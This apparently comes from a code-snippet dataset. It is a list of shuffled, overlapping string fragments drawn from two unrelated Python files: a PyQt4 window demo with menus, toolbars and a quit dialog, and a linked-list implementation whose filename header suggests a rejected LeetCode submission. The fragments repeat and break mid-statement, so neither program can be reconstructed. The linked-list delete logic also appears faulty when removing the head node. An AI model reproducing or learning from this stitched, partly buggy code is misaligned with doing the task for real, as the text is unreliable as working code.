self.setWindowIcon(QtGui.QIcon(icon_path)) # tooltip # QtGui.QToolTip.setFont(QtGui.QFont('SansSerif', 10)) #", "# menubar menubar = self.menuBar() menubar.setNativeMenuBar(False) fileMenu = menubar.addMenu('&File') fileMenu.addAction(exitAction) # binding the", "utf-8 -*- ''' a window with menu bar and tool bar QAction with", "300) qbtn = QtGui.QPushButton('Quit', self) qbtn.clicked.connect(QtCore.QCoreApplication.instance().quit) qbtn.resize(qbtn.sizeHint()) qbtn.move(100, 300) # status bar #", "self) qbtn.clicked.connect(QtCore.QCoreApplication.instance().quit) qbtn.resize(qbtn.sizeHint()) qbtn.move(100, 300) # status bar # self.statusBar().showMessage('Ready') # self.statusBar().showMessage('not Ready')", "widget') btn.resize(btn.sizeHint()) btn.move(0, 300) qbtn = QtGui.QPushButton('Quit', self) qbtn.clicked.connect(QtCore.QCoreApplication.instance().quit) qbtn.resize(qbtn.sizeHint()) qbtn.move(100, 300) #", "action exitAction = QtGui.QAction('&Exit', self) exitAction.setShortcut('Ctrl+Q') exitAction.setStatusTip('Exit application') exitAction.triggered.connect(QtGui.QApplication.quit) self.statusBar().showMessage('Ready') # menubar menubar", "menubar # toolbar self.toolbar = QtGui.QToolBar('name') self.toolbar.setToolButtonStyle(QtCore.Qt.ToolButtonTextUnderIcon) self.toolbar.addAction(exitAction) self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar) self.toolbar2 = QtGui.QToolBar('name') self.toolbar2.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon)", "menubar.addMenu('&File') fileMenu.addAction(exitAction) # binding the action to the menu in menubar # toolbar", "import sys from PyQt4 import QtGui,QtCore icon_path = join(os.getcwd(),'icon.png') class Example1(QtGui.QMainWindow): def __init__(self):", "def initUI(self): # text edit textEdit = QtGui.QTextEdit() self.setCentralWidget(textEdit) # menubar's action exitAction", "windows on screen and its size self.setWindowTitle('GUI Demo') # window icon self.setWindowIcon(QtGui.QIcon(icon_path)) #", "quit?\", QtGui.QMessageBox.Yes | QtGui.QMessageBox.No, QtGui.QMessageBox.No) if reply == QtGui.QMessageBox.Yes: event.accept() else: event.ignore() def", "QtGui.QDesktopWidget().availableGeometry().center() qr.moveCenter(cp) self.move(qr.topLeft()) def main(): app = QtGui.QApplication(sys.argv) # Every PyQt4 application must", "QtGui.QApplication(sys.argv) # Every PyQt4 application must create an application object #print sys.argv[1:] ex", "to the menu in menubar # toolbar self.toolbar = QtGui.QToolBar('name') self.toolbar.setToolButtonStyle(QtCore.Qt.ToolButtonTextUnderIcon) self.toolbar.addAction(exitAction) self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar)", "os from os.path import join import sys from PyQt4 import QtGui,QtCore icon_path =", "cp = QtGui.QDesktopWidget().availableGeometry().center() qr.moveCenter(cp) self.move(qr.topLeft()) def main(): app = QtGui.QApplication(sys.argv) # Every PyQt4", "widget') # create buttons btn = QtGui.QPushButton('Button', self) # btn.setToolTip('This is a <b>QPushButton</b>", "self.statusBar().showMessage('not Ready') # center the window on screen self.center() self.show() def closeEvent(self, event):", "class Example1(QtGui.QMainWindow): def __init__(self): super(Example1, self).__init__() self.initUI() def initUI(self): # text edit textEdit", "sys from PyQt4 import QtGui,QtCore icon_path = join(os.getcwd(),'icon.png') class Example1(QtGui.QMainWindow): def __init__(self): super(Example1,", "qbtn = QtGui.QPushButton('Quit', self) qbtn.clicked.connect(QtCore.QCoreApplication.instance().quit) qbtn.resize(qbtn.sizeHint()) qbtn.move(100, 300) # status bar # self.statusBar().showMessage('Ready')", "to quit?\", QtGui.QMessageBox.Yes | QtGui.QMessageBox.No, QtGui.QMessageBox.No) if reply == QtGui.QMessageBox.Yes: event.accept() else: event.ignore()", "fileMenu = menubar.addMenu('&File') fileMenu.addAction(exitAction) # binding the action to the menu in menubar", "a <b>QPushButton</b> widget') btn.resize(btn.sizeHint()) btn.move(0, 300) qbtn = QtGui.QPushButton('Quit', self) qbtn.clicked.connect(QtCore.QCoreApplication.instance().quit) qbtn.resize(qbtn.sizeHint()) qbtn.move(100,", "bar # self.statusBar().showMessage('Ready') # self.statusBar().showMessage('not Ready') # center the window on screen self.center()", "if reply == QtGui.QMessageBox.Yes: event.accept() else: event.ignore() def center(self): qr = self.frameGeometry() cp", "an application object #print sys.argv[1:] ex = Example1() sys.exit(app.exec_()) # The event handling", "import join import sys from PyQt4 import QtGui,QtCore icon_path = join(os.getcwd(),'icon.png') class Example1(QtGui.QMainWindow):", "#!/usr/bin/env python # -*- coding: utf-8 -*- ''' a window with menu bar", "screen self.center() self.show() def closeEvent(self, event): reply = QtGui.QMessageBox.question(self, 'Message', \"Are you sure", "# -*- coding: utf-8 -*- ''' a window with menu bar and tool", "icon_path = join(os.getcwd(),'icon.png') class Example1(QtGui.QMainWindow): def __init__(self): super(Example1, self).__init__() self.initUI() def initUI(self): #", "# toolbar self.toolbar = QtGui.QToolBar('name') self.toolbar.setToolButtonStyle(QtCore.Qt.ToolButtonTextUnderIcon) self.toolbar.addAction(exitAction) self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar) self.toolbar2 = QtGui.QToolBar('name') self.toolbar2.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon) self.toolbar2.addAction(exitAction)", "300, 550, 350) # set location of app windows on screen and its", "'Message', \"Are you sure to quit?\", QtGui.QMessageBox.Yes | QtGui.QMessageBox.No, QtGui.QMessageBox.No) if reply ==", "def main(): app = QtGui.QApplication(sys.argv) # Every PyQt4 application must create an application", "text edit textEdit = QtGui.QTextEdit() self.setCentralWidget(textEdit) # menubar's action exitAction = QtGui.QAction('&Exit', self)", "from os.path import join import sys from PyQt4 import QtGui,QtCore icon_path = join(os.getcwd(),'icon.png')", "menubar.setNativeMenuBar(False) fileMenu = menubar.addMenu('&File') fileMenu.addAction(exitAction) # binding the action to the menu in", "= QtGui.QToolBar('name') self.toolbar.setToolButtonStyle(QtCore.Qt.ToolButtonTextUnderIcon) self.toolbar.addAction(exitAction) self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar) self.toolbar2 = QtGui.QToolBar('name') self.toolbar2.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon) self.toolbar2.addAction(exitAction) self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar2) self.setGeometry(500, 300,", "fileMenu.addAction(exitAction) # binding the action to the menu in menubar # toolbar self.toolbar", "set window icon ''' import os from os.path import join import sys from", "application') exitAction.triggered.connect(QtGui.QApplication.quit) self.statusBar().showMessage('Ready') # menubar menubar = self.menuBar() menubar.setNativeMenuBar(False) fileMenu = menubar.addMenu('&File') fileMenu.addAction(exitAction)", "the menu in menubar # toolbar self.toolbar = QtGui.QToolBar('name') self.toolbar.setToolButtonStyle(QtCore.Qt.ToolButtonTextUnderIcon) self.toolbar.addAction(exitAction) self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar) self.toolbar2", "menu in menubar # toolbar self.toolbar = QtGui.QToolBar('name') self.toolbar.setToolButtonStyle(QtCore.Qt.ToolButtonTextUnderIcon) self.toolbar.addAction(exitAction) self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar) self.toolbar2 =", "qbtn.clicked.connect(QtCore.QCoreApplication.instance().quit) qbtn.resize(qbtn.sizeHint()) qbtn.move(100, 300) # status bar # self.statusBar().showMessage('Ready') # self.statusBar().showMessage('not Ready') #", "# self.statusBar().showMessage('not Ready') # center the window on screen self.center() self.show() def closeEvent(self,", "event.accept() else: event.ignore() def center(self): qr = self.frameGeometry() cp = QtGui.QDesktopWidget().availableGeometry().center() qr.moveCenter(cp) self.move(qr.topLeft())", "Ready') # center the window on screen self.center() self.show() def closeEvent(self, event): reply", "reply = QtGui.QMessageBox.question(self, 'Message', \"Are you sure to quit?\", QtGui.QMessageBox.Yes | QtGui.QMessageBox.No, QtGui.QMessageBox.No)", "qr.moveCenter(cp) self.move(qr.topLeft()) def main(): app = QtGui.QApplication(sys.argv) # Every PyQt4 application must create", "app = QtGui.QApplication(sys.argv) # Every PyQt4 application must create an application object #print", "QtGui.QMessageBox.No, QtGui.QMessageBox.No) if reply == QtGui.QMessageBox.Yes: event.accept() else: event.ignore() def center(self): qr =", "btn = QtGui.QPushButton('Button', self) # btn.setToolTip('This is a <b>QPushButton</b> widget') btn.resize(btn.sizeHint()) btn.move(0, 300)", "self.show() def closeEvent(self, event): reply = QtGui.QMessageBox.question(self, 'Message', \"Are you sure to quit?\",", "bar QAction with addAction for event handling(setting hot keys,showing status tip) set window", "action to the menu in menubar # toolbar self.toolbar = QtGui.QToolBar('name') self.toolbar.setToolButtonStyle(QtCore.Qt.ToolButtonTextUnderIcon) self.toolbar.addAction(exitAction)" ]
[ "nextNode=None): self.val = value self.next = nextNode class MyLinkedList(object): def __init__(self): \"\"\" Initialize", "\"\"\" Append a node of value val to the last element of the", "linked list. If index equals to the length of linked list, the node", "curr = curr.next def addAtHead(self, val): \"\"\" Add a node of value val", "index < 0 or index >= self.size: return -1 counter = 0 curr", ":type val: int :rtype: void \"\"\" if self.size == 0 or index ==", "if self.size == 0 or index == 0: self.addAtHead(val) else: node = Node(val)", "self.size == 1 and self.head: self.head = None self.size -= 1 elif self.size", "curr = curr.next curr.next = node self.size += 1 def addAtIndex(self, index, val):", "the first element of the linked list. After the insertion, the new node", "will be instantiated and called as such: # obj = MyLinkedList() # param_1", "If index equals to the length of linked list, the node will be", "node in the linked list. If the index is invalid, return -1. :type", "not be inserted. :type index: int :type val: int :rtype: void \"\"\" if", "instantiated and called as such: # obj = MyLinkedList() # param_1 = obj.get(index)", "== index: return curr.val counter += 1 curr = curr.next def addAtHead(self, val):", "self.head = None self.size = 0 def get(self, index): \"\"\" Get the value", "-= 1 elif self.size > 1: counter = 0 prev = None next", "linked list, if the index is valid. :type index: int :rtype: void \"\"\"", "value val to the last element of the linked list. :type val: int", "the end of linked list. If index is greater than the length, the", "of linked list, the node will be appended to the end of linked", "appended to the end of linked list. If index is greater than the", "self.size: return -1 counter = 0 curr = self.head while curr: if counter", "nextNode class MyLinkedList(object): def __init__(self): \"\"\" Initialize your data structure here. \"\"\" self.head", "return else: curr = curr.next def deleteAtIndex(self, index): \"\"\" Delete the index-th node", "the length, the node will not be inserted. :type index: int :type val:", "such: # obj = MyLinkedList() # param_1 = obj.get(index) # obj.addAtHead(val) # obj.addAtTail(val)", "int \"\"\" if index < 0 or index >= self.size: return -1 counter", "the linked list. After the insertion, the new node will be the first", "val: int :rtype: void \"\"\" node = Node(val) if self.head: node.next = self.head", "a node of value val before the first element of the linked list.", "the first node of the linked list. :type val: int :rtype: void \"\"\"", "and self.head: self.head = None self.size -= 1 elif self.size > 1: counter", "self.size -= 1 elif self.size > 1: counter = 0 prev = None", "\"\"\" node = Node(val) if not self.head: self.head = node else: curr =", "curr: if counter == index-1: node.next = curr.next curr.next = node self.size +=", "while next: if counter == index: prev.next = next.next self.size -= 1 return", "if counter == index: return curr.val counter += 1 curr = curr.next def", "= None self.size -= 1 elif self.size > 1: counter = 0 prev", "next next = next.next counter += 1 # Your MyLinkedList object will be", "linked list, the node will be appended to the end of linked list.", "= self.head while curr: if counter == index-1: node.next = curr.next curr.next =", "self.size = 0 def get(self, index): \"\"\" Get the value of the index-th", "if index == 0 and self.size == 1 and self.head: self.head = None", "\"\"\" Initialize your data structure here. \"\"\" self.head = None self.size = 0", "= node self.size += 1 def addAtTail(self, val): \"\"\" Append a node of", "int :rtype: void \"\"\" node = Node(val) if not self.head: self.head = node", "curr.next: curr = curr.next curr.next = node self.size += 1 def addAtIndex(self, index,", "index: int :rtype: void \"\"\" curr = self.head if index == 0 and", "\"\"\" self.head = None self.size = 0 def get(self, index): \"\"\" Get the", "node of value val before the index-th node in the linked list. If", "obj = MyLinkedList() # param_1 = obj.get(index) # obj.addAtHead(val) # obj.addAtTail(val) # obj.addAtIndex(index,val)", "= nextNode class MyLinkedList(object): def __init__(self): \"\"\" Initialize your data structure here. \"\"\"", "inserted. :type index: int :type val: int :rtype: void \"\"\" if self.size ==", "value self.next = nextNode class MyLinkedList(object): def __init__(self): \"\"\" Initialize your data structure", "node.next = curr.next curr.next = node self.size += 1 return else: curr =", "counter = 0 prev = None next = self.head while next: if counter", "is valid. :type index: int :rtype: void \"\"\" curr = self.head if index", "0 curr = self.head while curr: if counter == index: return curr.val counter", "int :rtype: int \"\"\" if index < 0 or index >= self.size: return", "elif self.size > 1: counter = 0 prev = None next = self.head", "is greater than the length, the node will not be inserted. :type index:", "= 0 curr = self.head while curr: if counter == index: return curr.val", "self.head = node else: curr = self.head while curr.next: curr = curr.next curr.next", ":type index: int :rtype: void \"\"\" curr = self.head if index == 0", "counter == index: prev.next = next.next self.size -= 1 return else: prev =", "int :rtype: void \"\"\" node = Node(val) if self.head: node.next = self.head self.head", "== 0 and self.size == 1 and self.head: self.head = None self.size -=", "will not be inserted. :type index: int :type val: int :rtype: void \"\"\"", "= self.head while curr: if counter == index: return curr.val counter += 1", "val before the first element of the linked list. After the insertion, the", "\"\"\" Add a node of value val before the index-th node in the", "1 and self.head: self.head = None self.size -= 1 elif self.size > 1:", "the node will not be inserted. :type index: int :type val: int :rtype:", "<filename>python_submission/707.design-linked-list.199616840.notac.py class Node(object): def __init__(self, value, nextNode=None): self.val = value self.next = nextNode", "0 curr = self.head while curr: if counter == index-1: node.next = curr.next", "node will be the first node of the linked list. :type val: int", "curr = self.head while curr: if counter == index-1: node.next = curr.next curr.next", "the last element of the linked list. :type val: int :rtype: void \"\"\"", "\"\"\" if index < 0 or index >= self.size: return -1 counter =", "value, nextNode=None): self.val = value self.next = nextNode class MyLinkedList(object): def __init__(self): \"\"\"", "index-1: node.next = curr.next curr.next = node self.size += 1 return else: curr", "\"\"\" Add a node of value val before the first element of the", "class Node(object): def __init__(self, value, nextNode=None): self.val = value self.next = nextNode class", "index: prev.next = next.next self.size -= 1 return else: prev = next next", "addAtHead(self, val): \"\"\" Add a node of value val before the first element", "MyLinkedList object will be instantiated and called as such: # obj = MyLinkedList()", "if self.head: node.next = self.head self.head = node else: self.head = node self.size", "of the linked list. After the insertion, the new node will be the", "def __init__(self): \"\"\" Initialize your data structure here. \"\"\" self.head = None self.size", "index-th node in the linked list, if the index is valid. :type index:", "the index-th node in the linked list. If index equals to the length", "= Node(val) if not self.head: self.head = node else: curr = self.head while", "length of linked list, the node will be appended to the end of", "called as such: # obj = MyLinkedList() # param_1 = obj.get(index) # obj.addAtHead(val)", "counter = 0 curr = self.head while curr: if counter == index: return", "def addAtIndex(self, index, val): \"\"\" Add a node of value val before the", "as such: # obj = MyLinkedList() # param_1 = obj.get(index) # obj.addAtHead(val) #", "= value self.next = nextNode class MyLinkedList(object): def __init__(self): \"\"\" Initialize your data", "list. If index is greater than the length, the node will not be", "list. If the index is invalid, return -1. :type index: int :rtype: int", "index: int :type val: int :rtype: void \"\"\" if self.size == 0 or", "linked list. If index is greater than the length, the node will not", "\"\"\" curr = self.head if index == 0 and self.size == 1 and", "in the linked list, if the index is valid. :type index: int :rtype:", "else: curr = curr.next def deleteAtIndex(self, index): \"\"\" Delete the index-th node in", "def addAtTail(self, val): \"\"\" Append a node of value val to the last", "val): \"\"\" Add a node of value val before the first element of", "of the linked list. :type val: int :rtype: void \"\"\" node = Node(val)", "int :rtype: void \"\"\" curr = self.head if index == 0 and self.size", "= MyLinkedList() # param_1 = obj.get(index) # obj.addAtHead(val) # obj.addAtTail(val) # obj.addAtIndex(index,val) #", "addAtIndex(self, index, val): \"\"\" Add a node of value val before the index-th", "0 or index == 0: self.addAtHead(val) else: node = Node(val) counter = 0", "while curr: if counter == index-1: node.next = curr.next curr.next = node self.size", "self.head = None self.size -= 1 elif self.size > 1: counter = 0", "< 0 or index >= self.size: return -1 counter = 0 curr =", "curr.next curr.next = node self.size += 1 return else: curr = curr.next def", "= None next = self.head while next: if counter == index: prev.next =", "self.head: node.next = self.head self.head = node else: self.head = node self.size +=", "than the length, the node will not be inserted. :type index: int :type", "val: int :rtype: void \"\"\" node = Node(val) if not self.head: self.head =", "element of the linked list. :type val: int :rtype: void \"\"\" node =", "= self.head self.head = node else: self.head = node self.size += 1 def", ":rtype: void \"\"\" node = Node(val) if self.head: node.next = self.head self.head =", "self.val = value self.next = nextNode class MyLinkedList(object): def __init__(self): \"\"\" Initialize your", "counter == index-1: node.next = curr.next curr.next = node self.size += 1 return", "Node(val) if not self.head: self.head = node else: curr = self.head while curr.next:", "equals to the length of linked list, the node will be appended to", "and self.size == 1 and self.head: self.head = None self.size -= 1 elif", "be appended to the end of linked list. If index is greater than", "+= 1 def addAtTail(self, val): \"\"\" Append a node of value val to", "val: int :rtype: void \"\"\" if self.size == 0 or index == 0:", "+= 1 def addAtIndex(self, index, val): \"\"\" Add a node of value val", "next = self.head while next: if counter == index: prev.next = next.next self.size", ">= self.size: return -1 counter = 0 curr = self.head while curr: if", "= node else: curr = self.head while curr.next: curr = curr.next curr.next =", "next = next.next counter += 1 # Your MyLinkedList object will be instantiated", "== 0: self.addAtHead(val) else: node = Node(val) counter = 0 curr = self.head", "def addAtHead(self, val): \"\"\" Add a node of value val before the first", "node of the linked list. :type val: int :rtype: void \"\"\" node =", "greater than the length, the node will not be inserted. :type index: int", "0 def get(self, index): \"\"\" Get the value of the index-th node in", "counter = 0 curr = self.head while curr: if counter == index-1: node.next", "valid. :type index: int :rtype: void \"\"\" curr = self.head if index ==", "1 def addAtIndex(self, index, val): \"\"\" Add a node of value val before", "= 0 def get(self, index): \"\"\" Get the value of the index-th node", ":rtype: void \"\"\" curr = self.head if index == 0 and self.size ==", "Node(val) counter = 0 curr = self.head while curr: if counter == index-1:", "node = Node(val) counter = 0 curr = self.head while curr: if counter", "void \"\"\" if self.size == 0 or index == 0: self.addAtHead(val) else: node", "curr.next def addAtHead(self, val): \"\"\" Add a node of value val before the", "of value val to the last element of the linked list. :type val:", "1 # Your MyLinkedList object will be instantiated and called as such: #", "prev = next next = next.next counter += 1 # Your MyLinkedList object", "If index is greater than the length, the node will not be inserted.", "last element of the linked list. :type val: int :rtype: void \"\"\" node", "self.size += 1 def addAtTail(self, val): \"\"\" Append a node of value val", "node self.size += 1 return else: curr = curr.next def deleteAtIndex(self, index): \"\"\"", "linked list. :type val: int :rtype: void \"\"\" node = Node(val) if self.head:", "None self.size -= 1 elif self.size > 1: counter = 0 prev =", "else: prev = next next = next.next counter += 1 # Your MyLinkedList", "the node will be appended to the end of linked list. If index", "None next = self.head while next: if counter == index: prev.next = next.next", "to the length of linked list, the node will be appended to the", "if the index is valid. :type index: int :rtype: void \"\"\" curr =", "length, the node will not be inserted. :type index: int :type val: int", "node in the linked list, if the index is valid. :type index: int", "self.size += 1 def addAtIndex(self, index, val): \"\"\" Add a node of value", "deleteAtIndex(self, index): \"\"\" Delete the index-th node in the linked list, if the", "0 prev = None next = self.head while next: if counter == index:", "val to the last element of the linked list. :type val: int :rtype:", "self.size == 0 or index == 0: self.addAtHead(val) else: node = Node(val) counter", "the new node will be the first node of the linked list. :type", "list, if the index is valid. :type index: int :rtype: void \"\"\" curr", "if index < 0 or index >= self.size: return -1 counter = 0", "+= 1 return else: curr = curr.next def deleteAtIndex(self, index): \"\"\" Delete the", "= curr.next def addAtHead(self, val): \"\"\" Add a node of value val before", "node will not be inserted. :type index: int :type val: int :rtype: void", "the linked list. :type val: int :rtype: void \"\"\" node = Node(val) if", "self.head: self.head = node else: curr = self.head while curr.next: curr = curr.next", "== index: prev.next = next.next self.size -= 1 return else: prev = next", "MyLinkedList() # param_1 = obj.get(index) # obj.addAtHead(val) # obj.addAtTail(val) # obj.addAtIndex(index,val) # obj.deleteAtIndex(index)", "node in the linked list. If index equals to the length of linked", "prev = None next = self.head while next: if counter == index: prev.next", "= Node(val) if self.head: node.next = self.head self.head = node else: self.head =", "in the linked list. If the index is invalid, return -1. :type index:", "val): \"\"\" Append a node of value val to the last element of", "addAtTail(self, val): \"\"\" Append a node of value val to the last element", "of linked list. If index is greater than the length, the node will", "self.size > 1: counter = 0 prev = None next = self.head while", "here. \"\"\" self.head = None self.size = 0 def get(self, index): \"\"\" Get", "# obj = MyLinkedList() # param_1 = obj.get(index) # obj.addAtHead(val) # obj.addAtTail(val) #", "else: node = Node(val) counter = 0 curr = self.head while curr: if", "1 return else: prev = next next = next.next counter += 1 #", ":type index: int :type val: int :rtype: void \"\"\" if self.size == 0", "index == 0 and self.size == 1 and self.head: self.head = None self.size", "to the end of linked list. If index is greater than the length,", "your data structure here. \"\"\" self.head = None self.size = 0 def get(self,", "Node(val) if self.head: node.next = self.head self.head = node else: self.head = node", "self.size -= 1 return else: prev = next next = next.next counter +=", "of value val before the index-th node in the linked list. If index", "while curr.next: curr = curr.next curr.next = node self.size += 1 def addAtIndex(self,", "__init__(self, value, nextNode=None): self.val = value self.next = nextNode class MyLinkedList(object): def __init__(self):", "self.head = node else: self.head = node self.size += 1 def addAtTail(self, val):", "self.head while curr.next: curr = curr.next curr.next = node self.size += 1 def", ":type val: int :rtype: void \"\"\" node = Node(val) if self.head: node.next =", ":rtype: void \"\"\" node = Node(val) if not self.head: self.head = node else:", "curr = self.head while curr: if counter == index: return curr.val counter +=", "= Node(val) counter = 0 curr = self.head while curr: if counter ==", "curr.next = node self.size += 1 def addAtIndex(self, index, val): \"\"\" Add a", "return -1. :type index: int :rtype: int \"\"\" if index < 0 or", "list. If index equals to the length of linked list, the node will", "else: curr = self.head while curr.next: curr = curr.next curr.next = node self.size", "node of value val to the last element of the linked list. :type", "will be appended to the end of linked list. If index is greater", "will be the first node of the linked list. :type val: int :rtype:", "\"\"\" Delete the index-th node in the linked list, if the index is", "index-th node in the linked list. If index equals to the length of", "self.head while curr: if counter == index-1: node.next = curr.next curr.next = node", "void \"\"\" node = Node(val) if self.head: node.next = self.head self.head = node", "index is greater than the length, the node will not be inserted. :type", "val): \"\"\" Add a node of value val before the index-th node in", "def get(self, index): \"\"\" Get the value of the index-th node in the", "= 0 prev = None next = self.head while next: if counter ==", "int :type val: int :rtype: void \"\"\" if self.size == 0 or index", "the insertion, the new node will be the first node of the linked", "self.head if index == 0 and self.size == 1 and self.head: self.head =", ":type val: int :rtype: void \"\"\" node = Node(val) if not self.head: self.head", "insertion, the new node will be the first node of the linked list.", "int :rtype: void \"\"\" if self.size == 0 or index == 0: self.addAtHead(val)", "before the first element of the linked list. After the insertion, the new", "return curr.val counter += 1 curr = curr.next def addAtHead(self, val): \"\"\" Add", "curr = curr.next def deleteAtIndex(self, index): \"\"\" Delete the index-th node in the", "index == 0: self.addAtHead(val) else: node = Node(val) counter = 0 curr =", "node else: self.head = node self.size += 1 def addAtTail(self, val): \"\"\" Append", "the index is invalid, return -1. :type index: int :rtype: int \"\"\" if", "value val before the index-th node in the linked list. If index equals", "index is invalid, return -1. :type index: int :rtype: int \"\"\" if index", "before the index-th node in the linked list. If index equals to the", "self.head: self.head = None self.size -= 1 elif self.size > 1: counter =", "= node else: self.head = node self.size += 1 def addAtTail(self, val): \"\"\"", "None self.size = 0 def get(self, index): \"\"\" Get the value of the", "0 and self.size == 1 and self.head: self.head = None self.size -= 1", "node else: curr = self.head while curr.next: curr = curr.next curr.next = node", "val before the index-th node in the linked list. If index equals to", "be instantiated and called as such: # obj = MyLinkedList() # param_1 =", "\"\"\" Get the value of the index-th node in the linked list. If", ":rtype: int \"\"\" if index < 0 or index >= self.size: return -1", "= self.head if index == 0 and self.size == 1 and self.head: self.head", "value val before the first element of the linked list. After the insertion,", "or index == 0: self.addAtHead(val) else: node = Node(val) counter = 0 curr", "= self.head while curr.next: curr = curr.next curr.next = node self.size += 1", "Add a node of value val before the first element of the linked", "else: self.head = node self.size += 1 def addAtTail(self, val): \"\"\" Append a", "= next next = next.next counter += 1 # Your MyLinkedList object will", "MyLinkedList(object): def __init__(self): \"\"\" Initialize your data structure here. \"\"\" self.head = None", "the index-th node in the linked list. If the index is invalid, return", "Node(object): def __init__(self, value, nextNode=None): self.val = value self.next = nextNode class MyLinkedList(object):", "of the index-th node in the linked list. If the index is invalid,", "curr.val counter += 1 curr = curr.next def addAtHead(self, val): \"\"\" Add a", "first element of the linked list. After the insertion, the new node will", "= None self.size = 0 def get(self, index): \"\"\" Get the value of", "in the linked list. If index equals to the length of linked list,", "linked list. After the insertion, the new node will be the first node", "if counter == index: prev.next = next.next self.size -= 1 return else: prev", "index): \"\"\" Delete the index-th node in the linked list, if the index", "+= 1 # Your MyLinkedList object will be instantiated and called as such:", "linked list. If the index is invalid, return -1. :type index: int :rtype:", "the length of linked list, the node will be appended to the end", "If the index is invalid, return -1. :type index: int :rtype: int \"\"\"", "curr.next def deleteAtIndex(self, index): \"\"\" Delete the index-th node in the linked list,", "to the last element of the linked list. :type val: int :rtype: void", "def __init__(self, value, nextNode=None): self.val = value self.next = nextNode class MyLinkedList(object): def", "1 def addAtTail(self, val): \"\"\" Append a node of value val to the", "and called as such: # obj = MyLinkedList() # param_1 = obj.get(index) #", "self.next = nextNode class MyLinkedList(object): def __init__(self): \"\"\" Initialize your data structure here.", "object will be instantiated and called as such: # obj = MyLinkedList() #", "= self.head while next: if counter == index: prev.next = next.next self.size -=", "if not self.head: self.head = node else: curr = self.head while curr.next: curr", "list. :type val: int :rtype: void \"\"\" node = Node(val) if self.head: node.next", "0 or index >= self.size: return -1 counter = 0 curr = self.head", "curr.next = node self.size += 1 return else: curr = curr.next def deleteAtIndex(self,", "node will be appended to the end of linked list. If index is", "= 0 curr = self.head while curr: if counter == index-1: node.next =", "# Your MyLinkedList object will be instantiated and called as such: # obj", "def deleteAtIndex(self, index): \"\"\" Delete the index-th node in the linked list, if", "1 elif self.size > 1: counter = 0 prev = None next =", "the linked list, if the index is valid. :type index: int :rtype: void", "counter += 1 # Your MyLinkedList object will be instantiated and called as", "After the insertion, the new node will be the first node of the", "list. :type val: int :rtype: void \"\"\" node = Node(val) if not self.head:", "== 0 or index == 0: self.addAtHead(val) else: node = Node(val) counter =", "new node will be the first node of the linked list. :type val:", "the index is valid. :type index: int :rtype: void \"\"\" curr = self.head", "Delete the index-th node in the linked list, if the index is valid.", ":type index: int :rtype: int \"\"\" if index < 0 or index >=", "list. After the insertion, the new node will be the first node of", "\"\"\" if self.size == 0 or index == 0: self.addAtHead(val) else: node =", "or index >= self.size: return -1 counter = 0 curr = self.head while", "node of value val before the first element of the linked list. After", "-1. :type index: int :rtype: int \"\"\" if index < 0 or index", "== index-1: node.next = curr.next curr.next = node self.size += 1 return else:", "= curr.next curr.next = node self.size += 1 return else: curr = curr.next", "-1 counter = 0 curr = self.head while curr: if counter == index:", "index): \"\"\" Get the value of the index-th node in the linked list.", "curr: if counter == index: return curr.val counter += 1 curr = curr.next", "= next.next counter += 1 # Your MyLinkedList object will be instantiated and", "self.head = node self.size += 1 def addAtTail(self, val): \"\"\" Append a node", "curr = self.head while curr.next: curr = curr.next curr.next = node self.size +=", "the linked list. If index equals to the length of linked list, the", "a node of value val to the last element of the linked list.", "index >= self.size: return -1 counter = 0 curr = self.head while curr:", "get(self, index): \"\"\" Get the value of the index-th node in the linked", "the linked list. If the index is invalid, return -1. :type index: int", "element of the linked list. After the insertion, the new node will be", "> 1: counter = 0 prev = None next = self.head while next:", "be inserted. :type index: int :type val: int :rtype: void \"\"\" if self.size", "Add a node of value val before the index-th node in the linked", "self.size += 1 return else: curr = curr.next def deleteAtIndex(self, index): \"\"\" Delete", "node self.size += 1 def addAtTail(self, val): \"\"\" Append a node of value", "void \"\"\" curr = self.head if index == 0 and self.size == 1", "= curr.next def deleteAtIndex(self, index): \"\"\" Delete the index-th node in the linked", "Your MyLinkedList object will be instantiated and called as such: # obj =", "index is valid. :type index: int :rtype: void \"\"\" curr = self.head if", "not self.head: self.head = node else: curr = self.head while curr.next: curr =", "while curr: if counter == index: return curr.val counter += 1 curr =", "1 return else: curr = curr.next def deleteAtIndex(self, index): \"\"\" Delete the index-th", "node = Node(val) if self.head: node.next = self.head self.head = node else: self.head", "void \"\"\" node = Node(val) if not self.head: self.head = node else: curr", "index: int :rtype: int \"\"\" if index < 0 or index >= self.size:", "be the first node of the linked list. :type val: int :rtype: void", "== 1 and self.head: self.head = None self.size -= 1 elif self.size >", "Initialize your data structure here. \"\"\" self.head = None self.size = 0 def", "counter += 1 curr = curr.next def addAtHead(self, val): \"\"\" Add a node", "0: self.addAtHead(val) else: node = Node(val) counter = 0 curr = self.head while", "of value val before the first element of the linked list. After the", "self.head while curr: if counter == index: return curr.val counter += 1 curr", "list, the node will be appended to the end of linked list. If", "is invalid, return -1. :type index: int :rtype: int \"\"\" if index <", "Append a node of value val to the last element of the linked", "curr.next curr.next = node self.size += 1 def addAtIndex(self, index, val): \"\"\" Add", "if counter == index-1: node.next = curr.next curr.next = node self.size += 1", "first node of the linked list. :type val: int :rtype: void \"\"\" node", "1: counter = 0 prev = None next = self.head while next: if", "= node self.size += 1 def addAtIndex(self, index, val): \"\"\" Add a node", "1 curr = curr.next def addAtHead(self, val): \"\"\" Add a node of value", "node = Node(val) if not self.head: self.head = node else: curr = self.head", "next.next counter += 1 # Your MyLinkedList object will be instantiated and called", "self.addAtHead(val) else: node = Node(val) counter = 0 curr = self.head while curr:", "node self.size += 1 def addAtIndex(self, index, val): \"\"\" Add a node of", "= curr.next curr.next = node self.size += 1 def addAtIndex(self, index, val): \"\"\"", "next: if counter == index: prev.next = next.next self.size -= 1 return else:", "curr = self.head if index == 0 and self.size == 1 and self.head:", "self.head while next: if counter == index: prev.next = next.next self.size -= 1", "return -1 counter = 0 curr = self.head while curr: if counter ==", "prev.next = next.next self.size -= 1 return else: prev = next next =", "= next.next self.size -= 1 return else: prev = next next = next.next", "next.next self.size -= 1 return else: prev = next next = next.next counter", "class MyLinkedList(object): def 